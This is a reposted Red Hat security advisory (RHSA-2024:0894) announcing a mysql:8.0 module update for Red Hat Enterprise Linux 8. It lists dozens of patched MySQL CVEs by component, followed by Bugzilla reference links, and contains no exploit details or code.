    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0894.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: mysql:8.0 security updateAdvisory ID:        RHSA-2024:0894-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0894Issue date:         2024-02-20Revision:           03CVE Names:          CVE-2022-4899====================================================================Summary: An update for the mysql:8.0 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon (mysqld) and many client programs and libraries.Security Fix(es):* mysql: InnoDB unspecified vulnerability (CPU Apr 2023) (CVE-2023-21911)* mysql: Server: DDL unspecified vulnerability (CPU Apr 2023) (CVE-2023-21919, CVE-2023-21929, CVE-2023-21933)* mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2023) (CVE-2023-21920, CVE-2023-21935, CVE-2023-21945, CVE-2023-21946, CVE-2023-21976, CVE-2023-21977, CVE-2023-21982)* mysql: Server: Components Services unspecified vulnerability (CPU Apr 2023) (CVE-2023-21940, CVE-2023-21947, CVE-2023-21962)* mysql: Server: Partition unspecified vulnerability (CPU Apr 2023) (CVE-2023-21953, CVE-2023-21955)* mysql: Server: JSON unspecified vulnerability (CPU Apr 2023) (CVE-2023-21966)* mysql: Server: DML unspecified vulnerability (CPU Apr 2023) (CVE-2023-21972)* mysql: Client programs unspecified vulnerability (CPU Apr 2023) (CVE-2023-21980)* mysql: Server: Replication unspecified vulnerability (CPU Jul 2023) (CVE-2023-22005, CVE-2023-22007, CVE-2023-22057)* mysql: InnoDB unspecified vulnerability (CPU Jul 2023) (CVE-2023-22008)* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2023) (CVE-2023-22032, CVE-2023-22059, CVE-2023-22064, CVE-2023-22065, CVE-2023-22070, CVE-2023-22078, CVE-2023-22079, CVE-2023-22092, CVE-2023-22103, CVE-2023-22110, CVE-2023-22112)* mysql: InnoDB unspecified vulnerability (CPU Jul 2023) (CVE-2023-22033)* mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2023) (CVE-2023-22046, CVE-2023-22054, CVE-2023-22056)* mysql: Client programs unspecified vulnerability (CPU Jul 2023) (CVE-2023-22053)* mysql: Server: DDL unspecified vulnerability (CPU Jul 2023) (CVE-2023-22058)* mysql: InnoDB unspecified vulnerability (CPU Oct 2023) (CVE-2023-22066, CVE-2023-22068, CVE-2023-22084, CVE-2023-22097, CVE-2023-22104, CVE-2023-22114)* mysql: Server: UDF unspecified vulnerability (CPU Oct 2023) (CVE-2023-22111)* mysql: Server: DML unspecified vulnerability (CPU Oct 2023) (CVE-2023-22115)* mysql: Server: RAPID unspecified vulnerability (CPU Jan 2024) (CVE-2024-20960)* mysql: Server: Security: Encryption unspecified vulnerability (CPU Jan 2024) (CVE-2024-20963)* mysql: Server: Security: Privileges unspecified vulnerability (CPU Jan 2024) (CVE-2024-20964)* mysql: Server: Replication unspecified vulnerability (CPU Jan 2024) (CVE-2024-20967)* mysql: Server: Options unspecified vulnerability (CPU Jan 2024) (CVE-2024-20968)* mysql: Server: DDL unspecified vulnerability (CPU Jan 2024) (CVE-2024-20969)* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2024) (CVE-2024-20961, CVE-2024-20962, CVE-2024-20965, CVE-2024-20966, CVE-2024-20970, CVE-2024-20971, CVE-2024-20972, CVE-2024-20973, CVE-2024-20974, CVE-2024-20976, CVE-2024-20977, CVE-2024-20978, CVE-2024-20982)* mysql: Server: DDL unspecified vulnerability (CPU Jan 2024) (CVE-2024-20981)* mysql: Server: DML unspecified vulnerability (CPU Jan 2024) (CVE-2024-20983)* mysql: Server : Security : Firewall unspecified vulnerability (CPU Jan 2024) (CVE-2024-20984)* mysql: Server: UDF unspecified vulnerability (CPU Jan 2024) (CVE-2024-20985)* zstd: mysql: buffer overrun in util.c (CVE-2022-4899)* mysql: Server: Security: Privileges unspecified vulnerability (CPU Jul 2023) (CVE-2023-22038)* mysql: Server: Pluggable Auth unspecified vulnerability (CPU Jul 2023) (CVE-2023-22048)* mysql: Server: Security: Encryption unspecified vulnerability (CPU Oct 2023) (CVE-2023-22113)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fix(es):* Fix for MySQL bug #33630199 in 8.0.32 introduces regression when --set-gtid-purged=OFF (RHEL-22452)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2022-4899References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2179864https://bugzilla.redhat.com/show_bug.cgi?id=2188109https://bugzilla.redhat.com/show_bug.cgi?id=2188113https://bugzilla.redhat.com/show_bug.cgi?id=2188115https://bugzilla.redhat.com/show_bug.cgi?id=2188116https://bugzilla.redhat.com/show_bug.cgi?id=2188117https://bugzilla.redhat.com/show_bug.cgi?id=2188118https://bugzilla.redhat.com/show_bug.cgi?id=2188119https://bugzilla.redhat.com/show_bug.cgi?id=2188120https://bugzilla.redhat.com/show_bug.cgi?id=2188121https://bugzilla.redhat.com/show_bug.cgi?id=2188122https://bugzilla.redhat.com/show_bug.cgi?id=2188123https://bugzilla.redhat.com/show_bug.cgi?id=2188124https://bugzilla.redhat.com/show_bug.cgi?id=2188125https://bugzilla.redhat.com/show_bug.cgi?id=2188127https://bugzilla.redhat.com/show_bug.cgi?id=2188128https://bugzilla.redhat.com/show_bug.cgi?id=2188129https://bugzilla.redhat.com/show_bug.cgi?id=2188130https://bugzilla.redhat.com/show_bug.cgi?id=2188131https://bugzilla.redhat.com/show_bug.cgi?id=2188132https://bugzilla.redhat.com/show_bug.cgi?id=2224211https://bugzilla.redhat.com/show_bug.cgi?id=2224212https://bugzilla.redhat.com/show_bug.cgi?id=2224213https://bugzilla.redhat.com/show_bug.cgi?id=2224214https://bugzilla.redhat.com/show_bug.cgi?id=2224215https://bugzilla.redhat.com/show_bug.cgi?id=2224216https://bugzilla.redhat.com/show_bug.cgi?id=2224217https://bugzilla.redhat.com/show_bug.cgi?id=2224218https://bugzilla.redhat.com/show_bug.cgi?id=2224219https://bugzilla.redhat.com/show_bug.cgi?id=2224220https://bugzilla.redhat.com/show_bug.cgi?id=2224221https://bugzilla.redhat.com/show_bug.cgi?id=2224222https://bugzilla.redhat.com/show_bug.cgi?id=2245014https://bugzilla.redhat.com/show_bug.cgi?id=2245015https://bugzilla.redhat.com/show_bug.cgi?id=2245016https://bugzilla.redhat.com/show_bug.cgi?id=2245017https://bugzilla.redhat.com/show_bug.cgi?id=2245018https://bugzilla.redhat.com/show_bug.cgi?id=2245019https://bugzilla.redhat.com/show_bug.cgi?id=2245020https://bugzilla.redhat.com/show_bug.cgi?id=2245021https://bugzilla.redhat.com/show_bug.cgi?id=2245022https://bugzilla.redhat.com/show_bug.cgi?id=2245023https://bugzilla.redhat.com/show_bug.cgi?id=2245024https://bugzilla.redhat.com/show_bug.cgi?id=2245026https://bugzilla.redhat.com/show_bug.cgi?id=2245027https://bugzilla.redhat.com/show_bug.cgi?id=2245028https://bugzilla.redhat.com/show_bug.cgi?id=2245029https://bugzilla.redhat.com/show_bug.cgi?id=2245030https://bugzilla.redhat.com/show_bug.cgi?id=2245031https://bugzilla.redhat.com/show_bug.cgi?id=2245032https://bugzilla.redhat.com/show_bug.cgi?id=2245033https://bugzilla.redhat.com/show_bug.cgi?id=2245034https://bugzilla.redhat.com/show_bug.cgi?id=2258771https://bugzilla.redhat.com/show_bug.cgi?id=2258772https://bugzilla.redhat.com/show_bug.cgi?id=2258773https://bugzilla.redhat.com/show_bug.cgi?id=2258774https://bugzilla.redhat.com/show_bug.cgi?id=2258775https://bugzilla.redhat.com/show_bug.cgi?id=2258776https://bugzilla.redhat.com/show_bug.cgi?id=2258777https://bugzilla.redhat.com/show_bug.cgi?id=2258778https://bugzilla.redhat.com/show_bug.cgi?id=2258779https://bugzilla.redhat.com/show_bug.cgi?id=2258780https://bugzilla.redhat.com/show_bug.cgi?id=2258781https://bugzilla.redhat.com/show_bug.cgi?id=2258782https://bugzilla.redhat.com/show_bug.cgi?id=2258783https://bugzilla.redhat.com/show_bug.cgi?id=2258784https://bugzilla.redhat.com/show_bug.cgi?id=2258785https://bugzilla.redhat.com/show_bug.cgi?id=2258787https://bugzilla.redhat.com/show_bug.cgi?id=2258788https://bugzilla.redhat.com/show_bug.cgi?id=2258789https://bugzilla.redhat.com/show_bug.cgi?id=2258790https://bugzilla.redhat.com/show_bug.cgi?id=2258791https://bugzilla.redhat.com/show_bug.cgi?id=2258792https://bugzilla.redhat.com/show_bug.cgi?id=2258793https://bugzilla.redhat.com/show_bug.cgi?id=2258794

Tag

#auth